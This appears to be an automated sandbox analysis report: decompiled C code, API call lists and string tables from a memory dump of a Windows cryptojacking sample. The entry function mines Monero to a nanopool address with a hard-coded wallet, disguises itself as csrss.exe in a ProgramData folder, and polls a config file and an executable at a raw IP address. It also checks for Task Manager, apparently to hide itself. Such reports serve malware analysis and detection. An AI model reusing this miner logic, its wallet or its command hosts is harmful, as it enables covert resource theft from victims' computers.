0x00408ae5
0x00408ae5
0x00408ad7
0x00408abe
0x00408a5d
0x00408a5d
0x00408a62
0x00408a62

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00408AAF
GetExitCodeProcess.KERNELBASE ref: 00408ACC
NtClose.NTDLL(00000000), ref: 00408AD9

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCodeExitOpen
String ID:
API String ID: 2358878597-0
Opcode ID: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
Instruction ID: 1b6c16884e814be030dd65664031e946cab864b4b59cb1ac47a8a8f8596fd444
Opcode Fuzzy Hash: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
Instruction Fuzzy Hash: 55111F71A0120CAFDF10DFA0C9487EE7BF8AB04354F10456AE818E6280EB799B48DF95

Uniqueness

Uniqueness Score: -1.00%

Function 004068E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004068E0(intOrPtr _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				char* _v44;
				long _v48;
				void* _v52;
				long _t25;

				_v52 = 0;
				asm("xorps xmm0, xmm0");
				_v32 = 0;
				asm("movups [ebp-0x2c], xmm0");
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				asm("movq [ebp-0x8], xmm0");
				 *0x5d10b8(_a4,  &_v12, 0, 0);
				_v52 = 0x18;
				_v44 =  &_v12;
				_v48 = 0;
				_v40 = 0x40;
				_v36 = 0;
				_v32 = 0;
				_t25 = NtCreateFile(0x5d2df8, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
				return _t25;
			}

0x004068ed
0x004068f8
0x004068fb
0x00406902
0x00406906
0x0040690d
0x00406914
0x0040691b
0x00406922
0x00406927
0x0040693f
0x00406946
0x00406950
0x0040695b
0x0040696d
0x00406974
0x0040697b
0x00406984

APIs

RtlDosPathNameToNtPathName_U.NTDLL(004068C5,004068C5,00000000,00000000), ref: 00406927
NtCreateFile.NTDLL(005D2DF8,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 0040697B

Strings

@, xrefs: 0040695B

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Path$CreateFileNameName_
String ID: @
API String ID: 3479931691-2766056989
Opcode ID: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
Instruction ID: fb5b581ab8e3c93d90c851d27248355ddc5a87700a0b749ee16a3b9d52e94ed7
Opcode Fuzzy Hash: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
Instruction Fuzzy Hash: FC11DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9107A2C0D7B522888F99

Uniqueness

Uniqueness Score: -1.00%

Function 00403680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00403680(signed int __edx, char _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				char* _v36;
				long _v40;
				void* _v44;
				long _t20;
				void* _t21;
				signed int _t23;

				_t23 = __edx;
				asm("xorps xmm0, xmm0");
				_v24 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v20 = 0;
				_v36 =  &_a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0x40;
				_v28 = 0;
				_v24 = 0;
				_t20 = NtCreateFile(0x5d2df4, 0x120089,  &_v44,  &_v20,  &_v12, 0x80, 0, 1, 0x60, 0, 0);
				_t21 =  *0x5d2df4; // 0x318
				_t22 =  !=  ? _t23 | 0xffffffff : _t21;
				 *0x5d2df4 =  !=  ? _t23 | 0xffffffff : _t21;
				return _t20;
			}

0x00403680
0x00403690
0x00403693
0x0040369a
0x004036a6
0x004036ad
0x004036b7
0x004036c2
0x004036d4
0x004036db
0x004036e2
0x004036e9
0x004036f0
0x004036f7
0x004036fe
0x00403704
0x0040370f
0x00403712
0x0040371b

APIs

NtCreateFile.NTDLL(005D2DF4,00120089,?,00000000,?,00000080,00000000,00000001,00000060,00000000,00000000), ref: 004036FE

Strings

@, xrefs: 004036E9

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: @
API String ID: 823142352-2766056989
Opcode ID: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
Instruction ID: 3021d29c1a01cdcb7ce1e86a2c6713ee4fd4a7efed1c7ac6ce7211f4987aa3f7
Opcode Fuzzy Hash: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
Instruction Fuzzy Hash: B2015EB0D4130CABEB14DF90CD49BDEBBF9BF18304F10420AE505762C0D7B516488B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404470, Relevance: 86.2, APIs: 29, Strings: 20, Instructions: 457
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			_entry_() {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				intOrPtr _v16;
				char _v20;
				int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				long _v32;
				long _v36;
				char _v38;
				short _v40;
				char _v48;
				char _v72;
				char _v592;
				char _v1112;
				char _v2136;
				char _v3160;
				void _v7224;
				long _t56;
				signed int _t61;
				void* _t65;
				long _t66;
				void* _t72;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				int _t80;
				void* _t82;
				void* _t84;
				void* _t89;
				void* _t90;
				void* _t91;
				intOrPtr _t93;
				void* _t94;
				long _t96;
				long _t99;
				void* _t102;
				char _t110;
				char _t114;
				char _t117;
				char _t119;
				short _t120;
				void* _t125;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t145;
				signed int _t148;
				char _t150;
				void* _t153;
				void* _t158;
				intOrPtr _t160;
				struct _SECURITY_ATTRIBUTES* _t161;
				void* _t166;
				struct _SECURITY_ATTRIBUTES* _t168;
				intOrPtr _t169;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t196;
				void* _t223;
				void* _t224;
				void* _t225;
				void* _t226;
				void* _t234;

				_v8 = 0;
				_v12 = 0;
				_v28 = 0;
				_t56 = GetTickCount();
				_t150 = 0;
				_v32 = _t56;
				_v36 = _t56;
				_v24 = 0;
				 *0x5d2df4 = 0;
				E00401670("xmr-us-east1.nanopool.org:14444", 0, 0xcc8);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				E00401BB0( &_v7224, 0, 0xfe0);
				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  &_v7224, 0x3f8 << 2);
				_t152 = 0;
				_t61 = SetErrorMode(2); // executed
				SetErrorMode(_t61 | 0x00000002); // executed
				E004017E0("e9c1286a28d82a2d0ee6", "e9c1286a28d82a2d0ee6");
				_t174 = _t171 + 0x2c;
				_t65 = CreateMutexA(0, 0, "e9c1286a28d82a2d0ee6"); // executed
				if(_t65 == 0) {
					ExitProcess(0x1e);
				}
				_t158 = GetLastError;
				_t66 = GetLastError();
				_t191 = _t66 - 0xb7;
				if(_t66 == 0xb7) {
					ExitProcess(0x1f);
				}
				E00403220(0, SetErrorMode, _t191);
				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
				if(_t166 != 0 && _v24 > 1) {
					_t148 = E004019C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
					_t174 = _t174 + 8;
					asm("sbb eax, eax");
					 *0x5d1bb8 =  *0x5d1bb8 &  ~_t148;
				}
				LocalFree(_t166);
				_t72 = E00401000(_t152, _t158, _t166,  *0x5d1314); // executed
				_t175 = _t174 + 4;
				_t195 = _t72;
				if(_t72 != 0) {
					E00408070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a"); // executed
					_t176 = _t175 + 4;
					_t196 =  *0x5d1bc0 - _t150; // 0x0
					if(_t196 != 0) {
						E004017E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						_t176 = _t176 + 8;
					}
					_t74 = E00401600("LKBNMTFJgl", "LKBNMTFJgl");
					_t177 = _t176 + 8;
					if(_t74 != 0) {
						_t75 = E00401600("csrss.exe", "csrss.exe");
						_t178 = _t177 + 8;
						if(_t75 != 0) {
							_t76 = E00401600("viTRMUuKeV", "viTRMUuKeV");
							_t179 = _t178 + 8;
							if(_t76 != 0) {
								_t77 = E00407FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x40aae0, 0x23); // executed
								_t180 = _t179 + 0xc;
								if(_t77 != 0) {
									E00401970("C:\ProgramData\LKBNMTFJgl", "\\");
									E00401970("C:\ProgramData\LKBNMTFJgl", "LKBNMTFJgl");
									_t181 = _t180 + 0x10;
									_t80 = CreateDirectoryW("C:\ProgramData\LKBNMTFJgl", 0); // executed
									if(_t80 != 0 || GetLastError() == 0xb7) {
										if(E00408DD0() != 0 &&  *0x5d210c == 1) {
											_t145 = CreateThread(0, 0, E00408450, 0, 0, 0); // executed
											 *0x5d211c = _t145;
										}
										_t82 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
										_t182 = _t181 + 8;
										if(_t82 == 0) {
											L33:
											_t84 = E00403150( &_v1112); // executed
											_t183 = _t182 + 4;
											if(_t84 != 0) {
												E004030B0( &_v1112,  &_v2136,  &_v3160);
												__imp__SetThreadExecutionState(0x80000041, 0);
												_t89 = E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
												_t185 = _t183 + 0x24;
												if(_t89 == 0) {
													L91:
													ExitProcess(0x3d);
												}
												_t90 = E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
												_t186 = _t185 + 0x14;
												if(_t90 == 0) {
													goto L91;
												}
												L38:
												while(1) {
													if( *0x5d1300 != 0) {
														_t169 = _v28;
														if(_t169 == 0) {
															_t96 = GetTickCount();
															_t215 = _t96 - _v36 - 0x4e20;
															if(_t96 - _v36 > 0x4e20) {
																E004065D0(_t215); // executed
																_t170 =  !=  ? 1 : _t169;
																_v28 =  !=  ? 1 : _t169;
															}
														}
													}
													if( *0x5d1308 == 3) {
														_t160 =  *0x5d1310; // 0x7530
														_t161 = _t160 + 1;
														__eflags = _t161;
													} else {
														_t161 = E00408040();
													}
													_t91 = E00408A50(_t150); // executed
													_t187 = _t186 + 4;
													_t168 =  ==  ? 1 : _t91;
													if( *0x5d1304 == 0) {
														_t93 = _v12;
													} else {
														_t93 = E00407EF0("taskmgr.exe"); // executed
														_t187 = _t187 + 4;
														_v12 = _t93;
													}
													if(_t150 == 0 || _t168 == 0) {
														if(_t93 != 0) {
															goto L58;
														}
														_t223 =  *0x5d1320 - _t93; // 0x0
														if(_t223 != 0) {
															goto L58;
														}
														_t224 =  *0x5d2110 - _t93; // 0x0
														if(_t224 != 0) {
															goto L58;
														}
														_t225 = _t161 -  *0x5d1310; // 0x7530
														if(_t225 <= 0) {
															__eflags =  *0x5d1308;
															if( *0x5d1308 != 0) {
																_t117 = E00403050(_t150, _t152,  &_v2136, 0); // executed
																_t187 = _t187 + 8;
																_t150 = _t117;
																_t168 = 1;
															}
															_v8 = 0;
															goto L68;
														}
														_t119 = E00403050(_t150, _t152,  &_v3160, _t93);
														_t187 = _t187 + 8;
														_v8 = 1;
														_t150 = _t119;
														_t168 = 1;
														goto L59;
													} else {
														L58:
														__eflags = _v8;
														if(_v8 == 0) {
															L68:
															_t234 = _t161 -  *0x5d1310; // 0x7530
															if(_t234 <= 0) {
																L75:
																__eflags = _v12;
																if(_v12 == 0) {
																	L77:
																	if( *0x5d1320 == 0) {
																		L79:
																		if( *0x5d2110 == 0) {
																			L82:
																			_t94 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
																			_t186 = _t187 + 8;
																			if(_t94 != 0) {
																				_t99 = GetTickCount();
																				_t152 =  *0x5d1bb4 * 0xea60;
																				_t245 = _t99 - _v32 -  *0x5d1bb4 * 0xea60;
																				if(_t99 - _v32 >  *0x5d1bb4 * 0xea60) {
																					_v32 = GetTickCount();
																					_t102 = E00404DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", _t150, _t168);
																					_t186 = _t186 + 0x14;
																					if(_t102 != 0) {
																						if(E004039B0(_t153) != 0) {
																							if(_t168 != 0) {
																								E00408730(_t150);
																								_t186 = _t186 + 4;
																							}
																							E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
																							E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
																							_t186 = _t186 + 0x28;
																						}
																						E00403B50(_t153, _v20, _v16);
																						_t186 = _t186 + 8;
																					}
																				}
																			}
																			Sleep(0xfa0); // executed
																			continue;
																		}
																		L80:
																		if(_t168 == 0) {
																			goto L82;
																		}
																		L81:
																		E00408730(_t150);
																		_t187 = _t187 + 4;
																		_t168 = 0;
																		goto L82;
																	}
																	L78:
																	if(_t168 != 0) {
																		goto L81;
																	}
																	goto L79;
																}
																L76:
																__eflags = _t168;
																if(_t168 != 0) {
																	goto L81;
																}
																goto L77;
															}
															if(_v12 != 0) {
																goto L76;
															}
															if( *0x5d1320 != 0) {
																goto L78;
															}
															if( *0x5d2110 != 0) {
																goto L80;
															}
															if(_t168 != 0) {
																E00408730(_t150);
																_t187 = _t187 + 4;
															}
															_t110 = E00403050(_t150, _t152,  &_v3160, 0);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t110;
															_t168 = 1;
															goto L77;
														}
														L59:
														_t226 = _t161 -  *0x5d1310; // 0x7530
														if(_t226 > 0) {
															goto L75;
														}
														if(_v12 != 0) {
															goto L76;
														}
														if( *0x5d1320 != 0) {
															goto L78;
														}
														if( *0x5d2110 != 0) {
															goto L80;
														}
														if(_t168 != 0) {
															E00408730(_t150);
															_t187 = _t187 + 4;
															_t168 = 0;
														}
														if( *0x5d1308 != 0) {
															_t114 = E00403050(_t150, _t152,  &_v2136, 0);
															_t187 = _t187 + 8;
															_t150 = _t114;
															_t168 = 1;
														}
														_v8 = 0;
														goto L68;
													}
												}
											}
											ExitProcess(0x1c);
										} else {
											_t120 =  *0x5d2074; // 0x3832
											asm("movq xmm0, [0x5d206c]");
											_v40 = _t120;
											asm("movq [ebp-0x2c], xmm0");
											_v38 = _t150;
											E00401A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
											_t125 = E00401600( &_v72,  &_v48);
											_t183 = _t182 + 0x10;
											if(_t125 == 0) {
												ExitProcess(0x2f);
											}
											E00401970( &_v592, "\\");
											E00401970( &_v592,  &_v72);
											E00401970( &_v592, "_");
											E00401970( &_v592, L"3.1.0");
											_t188 = _t183 + 0x20;
											_t137 =  *0x5d10b8( &_v592,  &_v20, 0, 0);
											_t207 = _t137 - 1;
											if(_t137 == 1) {
												_t139 = E004037E0(_t207,  &_v592); // executed
												_t189 = _t188 + 4;
												_t208 = _t139;
												if(_t139 != 0) {
													E004039B0(_t153);
													_push(_v16);
													E00403680(_t153, _v20);
													_t189 = _t189 + 8;
												}
												_t140 = E00404DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", 0, 0); // executed
												_t182 = _t189 + 0x14;
												if(_t140 != 0) {
													E004039B0(_t153);
													E00403B50(_t153, _v20, _v16); // executed
													_t182 = _t182 + 8;
												}
												goto L33;
											}
											ExitProcess(0x3c);
										}
									} else {
										ExitProcess(0x32);
									}
								}
								ExitProcess(0x31);
							}
							ExitProcess(0x30);
						}
						ExitProcess(0x30);
					} else {
						ExitProcess(0x30);
					}
				}
				ExitProcess(0x3b);
			}

0x0040447e
0x00404481
0x00404484
0x00404487
0x0040448d
0x0040448f
0x0040449d
0x004044a0
0x004044a3
0x004044a9
0x004044b9
0x004044be
0x004044c3
0x004044db
0x004044db
0x004044e5
0x004044eb
0x004044f7
0x004044fc
0x00404506
0x0040450e
0x00404512
0x00404512
0x00404518
0x0040451e
0x00404520
0x00404525
0x00404529
0x00404529
0x0040452f
0x00404545
0x00404549
0x00404559
0x0040455e
0x00404563
0x00404565
0x00404565
0x0040456c
0x00404578
0x0040457d
0x00404580
0x00404582
0x00404591
0x00404596
0x00404599
0x0040459f
0x004045ab
0x004045b0
0x004045b0
0x004045bd
0x004045c2
0x004045c7
0x004045db
0x004045e0
0x004045e5
0x004045f9
0x004045fe
0x00404603
0x00404619
0x0040461e
0x00404623
0x00404637
0x00404646
0x0040464b
0x00404655
0x0040465d
0x00404677
0x00404691
0x00404697
0x00404697
0x004046a6
0x004046ab
0x004046b0
0x004047b8
0x004047bf
0x004047c4
0x004047c9
0x004047f2
0x004047ff
0x0040481c
0x00404821
0x00404826
0x00404af0
0x00404af2
0x00404af2
0x00404843
0x00404848
0x0040484d
0x00000000
0x00000000
0x00000000
0x00404853
0x0040485f
0x00404861
0x00404866
0x00404868
0x00404871
0x00404876
0x00404878
0x0040487f
0x00404882
0x00404882
0x00404876
0x00404866
0x0040488c
0x00404897
0x0040489d
0x0040489d
0x0040488e
0x00404893
0x00404893
0x0040489f
0x004048a6
0x004048b1
0x004048bb
0x004048cf
0x004048bd
0x004048c2
0x004048c7
0x004048ca
0x004048ca
0x004048d4
0x004048dc
0x00000000
0x00000000
0x004048de
0x004048e4
0x00000000
0x00000000
0x004048e6
0x004048ec
0x00000000
0x00000000
0x004048ee
0x004048f4
0x00404916
0x0040491d
0x00404928
0x0040492d
0x00404930
0x00404932
0x00404932
0x00404937
0x00000000
0x00404937
0x004048fe
0x00404903
0x00404906
0x0040490d
0x0040490f
0x00000000
0x00404940
0x00404940
0x00404940
0x00404944
0x004049ab
0x004049ab
0x004049b1
0x004049f9
0x004049f9
0x004049fd
0x00404a03
0x00404a0a
0x00404a10
0x00404a17
0x00404a28
0x00404a32
0x00404a37
0x00404a3c
0x00404a48
0x00404a4a
0x00404a57
0x00404a59
0x00404a72
0x00404a75
0x00404a7a
0x00404a7f
0x00404a88
0x00404a8c
0x00404a8f
0x00404a94
0x00404a94
0x00404aae
0x00404aca
0x00404acf
0x00404acf
0x00404ad8
0x00404add
0x00404add
0x00404a7f
0x00404a59
0x00404ae5
0x00000000
0x00404ae5
0x00404a19
0x00404a1b
0x00000000
0x00000000
0x00404a1d
0x00404a1e
0x00404a23
0x00404a26
0x00000000
0x00404a26
0x00404a0c
0x00404a0e
0x00000000
0x00000000
0x00000000
0x00404a0e
0x004049ff
0x004049ff
0x00404a01
0x00000000
0x00000000
0x00000000
0x00404a01
0x004049b7
0x00000000
0x00000000
0x004049c0
0x00000000
0x00000000
0x004049c9
0x00000000
0x00000000
0x004049cd
0x004049d0
0x004049d5
0x004049d5
0x004049e1
0x004049e6
0x004049e9
0x004049f0
0x004049f2
0x00000000
0x004049f2
0x00404946
0x00404946
0x0040494c
0x00000000
0x00000000
0x00404956
0x00000000
0x00000000
0x00404963
0x00000000
0x00000000
0x00404970
0x00000000
0x00000000
0x00404978
0x0040497b
0x00404980
0x00404983
0x00404983
0x0040498c
0x00404997
0x0040499c
0x0040499f
0x004049a1
0x004049a1
0x004049a8
0x00000000
0x004049a8
0x004048d4
0x00404853
0x004047cd
0x004046b6
0x004046b6
0x004046bc
0x004046c4
0x004046d4
0x004046d9
0x004046dc
0x004046e9
0x004046ee
0x004046f3
0x004047d5
0x004047d5
0x00404705
0x00404715
0x00404726
0x00404737
0x0040473c
0x0040474e
0x00404754
0x00404756
0x00404767
0x0040476c
0x0040476f
0x00404771
0x00404773
0x00404778
0x0040477e
0x00404783
0x00404783
0x00404799
0x0040479e
0x004047a3
0x004047a5
0x004047b0
0x004047b5
0x004047b5
0x00000000
0x004047a3
0x0040475a
0x0040475a
0x00404668
0x0040466a
0x0040466a
0x0040465d
0x00404627
0x00404627
0x00404607
0x00404607
0x004045e9
0x004045c9
0x004045cb
0x004045cb
0x004045c7
0x00404586

APIs

GetTickCount.KERNEL32 ref: 00404487
SetErrorMode.KERNELBASE(00000002), ref: 004044E5
SetErrorMode.KERNELBASE(00000000), ref: 004044EB
CreateMutexA.KERNELBASE(00000000,00000000,e9c1286a28d82a2d0ee6), ref: 00404506
ExitProcess.KERNEL32 ref: 00404512
GetLastError.KERNEL32 ref: 0040451E
ExitProcess.KERNEL32 ref: 00404529

Strings

e9c1286a28d82a2d0ee6, xrefs: 004044ED
FALSE, xrefs: 004046A1
LKBNMTFJgl, xrefs: 004045B8, 0040463C
e9c1286a28d82a2d0ee6, xrefs: 004044F2, 004044FF
d06ed635-68f6-4e9a-955c-4899f5f57b9a, xrefs: 0040458C, 004045A1
48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos, xrefs: 004044D6, 004045A6, 00404810, 00404837, 00404AA2, 00404ABE
xmr-us-east1.nanopool.org:14444, xrefs: 00404815, 0040483C, 00404AA7, 00404AC3
LKBNMTFJgl, xrefs: 004045B3
taskmgr.exe, xrefs: 004048BD
--show-window, xrefs: 00404551
viTRMUuKeV, xrefs: 004045EF
C:\ProgramData\LKBNMTFJgl, xrefs: 00404614, 00404632, 00404641, 00404650, 004046CE
csrss.exe, xrefs: 004045D6
FALSE, xrefs: 00404A2D
http://45.144.225.135/config.txt, xrefs: 0040469C, 00404794, 00404A28, 00404A6D
FALSE, xrefs: 0040478F, 00404A68
xmr-us-east1.nanopool.org:14444, xrefs: 00404498, 0040478A, 00404A63
csrss.exe, xrefs: 004045D1
3.1.0, xrefs: 00404731
viTRMUuKeV, xrefs: 004045F4

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Error$ExitModeProcess$CountCreateLastMutexTick
String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$taskmgr.exe$viTRMUuKeV$viTRMUuKeV$xmr-us-east1.nanopool.org:14444$xmr-us-east1.nanopool.org:14444
API String ID: 3615071802-544947428
Opcode ID: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
Instruction ID: deaf04295798d6261b51ffebf117c96f993ab97e4c983c13017be75728aacaa1
Opcode Fuzzy Hash: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
Instruction Fuzzy Hash: E9F1F7F5E41704B7DB20ABB5AD06B9F36A86B50749F040437FA04B22D2E77C5A44CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403220, Relevance: 65.0, APIs: 3, Strings: 34, Instructions: 237
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403220(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _t10;
				intOrPtr _t14;
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t27;
				void* _t31;
				void* _t35;
				long _t37;
				short _t38;
				void* _t41;
				void* _t43;
				struct HINSTANCE__* _t44;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t48;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				struct HINSTANCE__* _t58;
				struct HINSTANCE__* _t60;
				void* _t67;
				void* _t70;
				void* _t73;

				_t67 = __esi;
				_t43 = __ecx;
				 *0x5d1300 = 0;
				 *0x5d1304 = 0;
				 *0x5d1308 = 0;
				 *0x5d130c = 0;
				 *0x5d1310 = 0x7530;
				 *0x5d1238 = 0x5f;
				 *0x5d12bc = 0x18;
				 *0x5d19ac = 0x20;
				 *0x5d19b0 = 5;
				 *0x5d1318 = 0;
				 *0x5d131c = 0;
				 *0x5d1320 = 0;
				 *0x5d1bb8 = 1;
				 *0x5d1bbc = 0xa;
				 *0x5d1bc0 = 0;
				 *0x5d1c24 = 0;
				 *0x5d210c = 1;
				E00401BB0("[no-email]", 0, 0x80);
				E004017E0("[no-email]", "[no-email]");
				E004017E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
				asm("xorps xmm0, xmm0");
				 *0x5d1c48 = 0;
				asm("movups [0x5d1c28], xmm0");
				asm("movups [0x5d1c38], xmm0");
				E00401BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
				E00401BB0("csrss.exe", 0, 0x60);
				asm("xorps xmm0, xmm0");
				asm("movups [0x5d158c], xmm0");
				asm("movups [0x5d159c], xmm0");
				E00401BB0("http://45.144.225.135/notepad.exe", 0, 0x200);
				E00401BB0(0x5d12c0, 0, 0x40);
				E00401640(0x5d12c0, 0x409df0, 0x40);
				E00401BB0("http://45.144.225.135/config.txt", 0, 0x200);
				_t10 =  *0x5d19ac; // 0x20
				E00401640("http://45.144.225.135/config.txt", 0x409e30, _t10 + 1);
				E00401BB0("FALSE", 0, 0x200);
				_t14 =  *0x5d19b0; // 0x5
				E00401640("FALSE", "FALSE", _t14 + 1);
				_t17 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
				_t73 = _t70 + 0x90;
				if(_t17 != 0) {
					E00401CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x5d19ac);
					_t41 = E004017B0("FALSE", "FALSE");
					_t73 = _t73 + 0x18;
					if(_t41 != 0) {
						E00401CE0("0125789244697858", 0x10, "FALSE",  *0x5d19b0);
						_t73 = _t73 + 0x10;
					}
				}
				_t19 = E00408270(_t43, GetCurrentProcess());
				 *0x5d1314 = _t19;
				if(_t19 != 0) {
					E00408DD0();
					_t60 =  *0x5d1318; // 0x0
					_t61 =  ==  ? 1 : _t60;
					 *0x5d1318 =  ==  ? 1 : _t60;
				}
				_push(_t67);
				E004017B0("TRUE", "TRUE");
				_t44 =  *0x5d1300; // 0x1
				_t45 =  ==  ? 1 : _t44;
				 *0x5d1300 =  ==  ? 1 : _t44;
				E004017B0("TASKMGR", "TASKMGR");
				_t46 =  *0x5d1304; // 0x1
				_t47 =  ==  ? 1 : _t46;
				 *0x5d1304 =  ==  ? 1 : _t46;
				E004017B0("1THREAD", "50%CPU");
				_t48 =  *0x5d1308; // 0x2
				_t49 =  ==  ? 1 : _t48;
				 *0x5d1308 =  ==  ? 1 : _t48;
				E004017B0("50%CPU", "50%CPU");
				_t50 =  *0x5d1308; // 0x2
				_t51 =  ==  ? 2 : _t50;
				 *0x5d1308 =  ==  ? 2 : _t50;
				E004017B0("100%CPU", "50%CPU");
				_t52 =  *0x5d1308; // 0x2
				_t53 =  ==  ? 3 : _t52;
				 *0x5d1308 =  ==  ? 3 : _t52;
				E004017B0("100%CPU", "100%CPU");
				_t54 =  *0x5d130c; // 0x1
				_t55 =  ==  ? 1 : _t54;
				 *0x5d1bb4 = 0x1e;
				 *0x5d130c =  ==  ? 1 : _t54;
				E00401BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0, 0x100);
				_t27 =  *0x5d1238; // 0x5f
				E00401640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x409f40, _t27 + 1);
